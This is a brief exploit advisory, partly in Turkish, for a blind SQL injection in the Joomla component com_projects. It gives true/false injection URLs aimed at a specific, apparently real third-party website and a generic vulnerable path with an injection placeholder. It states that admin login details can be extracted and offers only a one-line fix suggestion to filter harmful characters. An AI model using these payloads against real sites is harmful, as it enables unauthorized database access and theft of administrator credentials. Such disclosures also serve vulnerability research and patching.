<------------------- header data start ------------------- >

#############################################################

# author : Kadir DOGAN ~ Bug Researchers

# Script Name : Joomla Component com_projects Blind SQL injection Vulnerability

# Bug Type : SqL Injections

# Infection : Admin login bilgileri alinabilir.

# Demo Vuln. :

TRUE(+)
» http://www.oma.eu/index.php?option=com_projects&view=portal&id=456+and+1=1&Itemid=10
FALSE(-)
» http://www.oma.eu/index.php?option=com_projects&view=portal&id=456+and+1=0&Itemid=10

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_projects&view=portal&id=[Blind SqL]&Itemid=[Number]

< -- bug code end of -- >